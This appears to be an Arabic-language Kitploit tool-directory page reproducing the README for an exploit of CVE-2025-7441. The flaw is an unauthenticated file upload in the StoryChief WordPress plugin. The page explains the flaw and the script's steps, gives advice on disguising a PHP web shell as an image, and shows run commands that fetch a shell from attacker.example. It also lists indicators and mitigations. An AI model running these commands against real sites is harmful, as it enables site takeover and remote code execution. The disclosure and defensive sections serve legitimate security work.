Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-7441 — StoryChief <= 1.0.42 - رفع ملفات عشوائي بدون مصادقة | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-7441
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubnxploited/cve-2025-7441

CVE-2025-7441

StoryChief <= 1.0.42 - رفع ملفات عشوائي بدون مصادقة

عرض المستودع
1منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-7441

StoryChief <= 1.0.42 - رفع ملفات تعسفي بدون مصادقة

🚨 StoryChief <= 1.0.42 — رفع ملفات تعسفي بدون مصادقة (CVE-2025-7441)

ℹ️ الملخص

إصدارات StoryChief (إضافة ووردبريس) حتى 1.0.42 ضمنًا تتضمن ثغرة حرجة لرفع ملفات تعسفي بدون مصادقة عبر نقطة نهاية REST /wp-json/storychief/webhook. يمكن للمهاجم دفع الإضافة إلى جلب مورد بعيد يتحكم به المهاجم (مثل قشرة ويب) وحفظه في دليل uploads الخاص بالموقع، مما يتيح تنفيذ أكواد عن بُعد في العديد من نشرات ووردبريس الافتراضية.

  • CVE: CVE-2025-7441
  • CVSS: 9.8 (حرجة)

💥 الأثر

  • رفع ملفات عن بُعد بدون مصادقة إلى wp-content/uploads/YYYY/MM/.
  • إمكانية تنفيذ أكواد عن بُعد عندما يكون الملف المرفوع قابلاً للتنفيذ (مثل PHP).
  • اختراق كامل للموقع ممكن عندما يكون ووردبريس مكوّنًا على تنفيذ PHP المرفوع تحت جذر المستندات.

🧩 السبب الجذري للثغرة

تقبل الإضافة حمولة JSON واردة (حدث نشر) تحتوي على حقل featured_image -> data -> sizes -> full يشير إلى عنوان URL تعسفي. لا يقوم StoryChief بتحقق كافٍ من نوع/محتوى الملف ولا يقيّد مصدر العنوان، مما يسمح للإضافة بجلب المورد البعيد وحفظه في دليل uploads الخاص بالموقع. لا يوجد تحقق كافٍ لمنع تخزين ملفات تحتوي على أكواد قابلة للتنفيذ.


🛠️ سكربت الاستغلال — ماذا يفعل (ربطه بالثغرة)

يشرح هذا القسم سكربت الاستغلال (المقدَّم بشكل منفصل) على مستوى عالٍ ويربط كل سلوك مهم بالثغرة الكامنة.

  • تحليل وسائط سطر الأوامر — عنوان URL الهدف (-u/--url)، عنوان URL للقشرة البعيدة (-shell)، مفتاح HMAC اختياري، ترويسات، علامات proxy/timeout/retry، وخيارات التصحيح والطباعة فقط.
  • تطبيع الهدف — يضيف /wp-json/storychief/webhook عند إدخال جذر الموقع.
  • التحقق من عنوان URL للقشرة — يتحقق من إمكانية الوصول إلى العنوان البعيد (HEAD/GET أو curl).
  • استخراج اسم الملف — يستخدم اسم الأساس (basename) للعنوان البعيد لاستنتاج اسم ملف uploads النهائي.
  • بناء الحمولة — يضع العنوان الذي يتحكم به المهاجم في data.featured_image.data.sizes.full لإجبار الإضافة على جلب الملف وتخزينه.
  • توقيع HMAC (اختياري) — يحسب meta.mac (HMAC-SHA256) باستخدام مفتاح سداسي عشري اختياري؛ قد تتجاهله بعض الخوادم أو تتطلبه.
  • التسليم — يستخدم requests مع إعادة محاولات/مهلة تراجع أو curl كبديل، ويدعم الترويسات المخصصة والوكلاء و --no-verify.
  • معالجة الاستجابة — يحلل استجابات JSON بحثًا عن مفاتيح permalink/id لاكتشاف النجاح؛ وإلا يبلغ عن الفشل.
  • المخرجات — عند النجاح يطبع مسار uploads المتوقع: wp-content/uploads/YYYY/MM/.

🖼️ متطلبات ملف القشرة (حرجة)

عند استخدام ملف PHP بعيد (مثال: https://attacker.example/shell.php) يجب أن يتضمّن الملف ترويسة صورة صالحة (بايتات سحرية) حتى تتعامل معه الإضافة أو كود معالجة الصور وتقبله كصورة. نقاط أساسية:

  • استخدم نهج الملف متعدد الصيغ (polyglot): يجب أن يبدأ الملف ببايتات سحرية صالحة للصورة (مثل JPEG أو PNG أو GIF) حتى تقبلها الفحوصات البسيطة ومعالجات الصور، مع احتوائه أيضًا على حمولة PHP في قسم يبقى على القرص كما هو حرفيًا.
  • بايتات سحرية شائعة للصور:
    • JPEG: 0xFF 0xD8 0xFF
    • PNG: 0x89 0x50 0x4E 0x47
    • GIF: ASCII "GIF89a" أو "GIF87a"
  • لا تعتمد على اسم الملف/الامتداد فقط. تفحص إضافات عديدة محتويات الملف أو تستخدم مكتبات (GD, ImageMagick) تتحقق من سلامة الصورة.
  • يعتمد على البيئة: قد تتحقق بعض الخوادم من الصور أو تعيد ترميزها، مما قد يزيل الكود المحقون. اختبر في مختبر مصرح به أولًا.
  • تذكير أخلاقي: لا تنشر كود قشرة ويب عاملًا هنا. أنشئ مثل هذه الملفات واختبرها فقط في بيئات مصرح بها.

▶️ طريقة التشغيل (أمثلة)

استبدل العناصر النائبة بأهداف مصرح بها. تستخدم جميع الأمثلة أدناه عنوان URL لقشرة PHP بعيدة.

  • مثال أساسي:
root@kitploit:~
python3 CVE-2025-7441.py -u https://target.example -shell https://attacker.example/shell.php
  • مع مسار webhook صريح ووضع التصحيح:
root@kitploit:~
python3 CVE-2025-7441.py -u https://target.example/wp-json/storychief/webhook -shell https://attacker.example/shell.php --debug
  • استخدام curl بدلاً من requests:
root@kitploit:~
python3 CVE-2025-7441.py -u https://target.example -shell https://attacker.example/shell.php --use-curl
  • طباعة الحمولة فقط (بدون إرسال):
root@kitploit:~
python3 CVE-2025-7441.py -u https://target.example -shell https://attacker.example/shell.php --print-only

علامات مهمة:

  • --no-verify: تخطي التحقق من TLS (استخدم بحذر).
  • --proxy: توجيه الطلبات عبر وكيل.
  • --header "Key: Value": إضافة ترويسات مخصصة.

📤 المخرجات المتوقعة

  • تشغيل ناجح:
    • Uploaded: wp-content/uploads/2025/10/shell.php
  • أمثلة التصحيح:
    • [DEBUG] shell HEAD status: 200
    • [DEBUG] post status: 200
    • [DEBUG] curl cmd: curl -s -X POST https://target... -H Content-Type: application/json -d '{"meta":...}'
  • رسائل الفشل:
    • "[-] Error: shell URL is not reachable (not HTTP 200)"
    • "[-] Error: request failed"
    • "[-] Error: upload failed or endpoint returned non-JSON/HTML"

🔎 الكشف ومؤشرات الاختراق (IoC)

  • طلبات POST غير متوقعة إلى /wp-json/storychief/webhook من عناوين IP مجهولة.
  • ملفات جديدة في wp-content/uploads/// بامتدادات PHP أو امتدادات صور تحتوي على كود مدمج.
  • سجلات خادم الويب تُظهر طلبات GET صادرة إلى نطاقات يتحكم بها المهاجم، تليها عمليات وصول إلى الملفات المرفوعة.
  • ملفات صور مشبوهة تحتوي على محتوى إضافي أو مدمج غير متعلق بالصور.

🛡️ التخفيف والمعالجة

على المدى القصير:

  • قم بترقية StoryChief إلى إصدار مصحح فور توفره.
  • احظر أو قيّد /wp-json/storychief/webhook عبر WAF أو قواعد الخادم.
  • قيّد عمليات الجلب الصادرة من الخادم أو حركة المرور الخارجة إلى نطاقات غير موثوقة.

إرشادات للمطورين:

  • تحقق من أنواع الملفات ومحتوياتها بعد أي جلب عن بُعد؛ تحقق من الصور باستخدام محللات آمنة وارفض الملفات غير الصالحة.
  • اطلب المصادقة للويب هوكس التي تسبب تنزيلات من جانب الخادم أو إنشاء ملفات.
  • تأكد من تنفيذ وإنفاذ التحقق من التوقيع/HMAC.
  • خزّن المحتوى المرفوع خارج جذر الويب أو عطّل تنفيذ الملفات المرفوعة في wp-content/uploads (قواعد خادم الويب).

⚠️ القيود والتحذيرات

  • يعتمد نجاح الاستغلال على تكوين الخادم ومكتبات معالجة الصور وسياسات تنفيذ خادم الويب.
  • قد تزيل الخوادم التي تعيد معالجة الصور أو تعيد ترميزها الحمولات المحقونة.
  • إذا كانت الإضافة تتحقق من التوقيعات، فقد يؤدي تزويد mac غير صحيح إلى الرفض.

🤝 الاستخدام المسؤول

هذه الوثيقة مخصصة للمدافعين والمختبِرين المصرح لهم. لا تستخدم هذه التقنيات ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. الاستغلال غير المصرح به غير قانوني وغير أخلاقي.

إذا كنت تبلغ الجهة المصنعة أو مالك الموقع بالمشكلة، فاذكر تفاصيل إعادة الإنتاج وخطوات المعالجة الآمنة والإصلاحات المقترحة.


📚 المراجع والإسناد

  • التقرير وسكربت الاستغلال بواسطة: Nxploited (Khaled Alenazi) — اسم ملف السكربت: CVE-2025-7441.py (مقدَّم بشكل منفصل)
  • CVE: CVE-2025-7441
  • CVSS: 9.8
تنزيل الأداة